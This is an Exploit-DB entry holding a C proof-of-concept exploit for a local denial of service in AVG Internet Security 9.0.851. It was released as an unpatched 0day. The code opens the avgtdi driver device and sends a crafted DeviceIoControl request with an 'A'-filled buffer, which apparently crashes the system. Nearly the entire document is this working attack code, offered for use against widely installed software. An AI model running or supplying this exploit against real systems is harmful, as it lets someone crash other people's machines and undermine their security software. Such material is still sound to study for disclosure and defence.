AVG Internet Security 9.0.851 - Local Denial of Service

EDB-ID:

15384

CVE:





Platform:

Windows

Date:

2010-11-02


/*
# Exploit Title: AVG Internet Security 0day Local DoS Exploit
# Date: 2010-11-01 
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.avg.com
# Version: up to date, version 9.0.851, avgtdix.sys version 9.0.0.832
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <share.h>



int main(int argc, char **argv)
{
	HANDLE   hDevice;
	DWORD    cb;
	void		*buff;
	int outlen = 0x18, inlen = 0x10;
	DWORD ioctl = 0x830020C8;
	char deviceName[] = "\\\\.\\avgtdi";
	char logName[] = "avgtdi.log";

	if ( (hDevice = CreateFileA(deviceName, 
						  GENERIC_READ|GENERIC_WRITE,
						  0,
						  0,
						  OPEN_EXISTING,
						  0,
						  NULL) ) != INVALID_HANDLE_VALUE )
	{
		printf("Device  succesfully opened!\n");
	}
	else
	{
		printf("Error: Error opening device \n");
		return 0;
	}

	cb = 0;
	buff = malloc(0x1000);
	if(!buff){
	  printf("malloc failed");
	  return 0;
	}
	memset(buff, 'A', 0x1000-1);



	DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff, outlen, &cb, NULL);

	free(buff);
}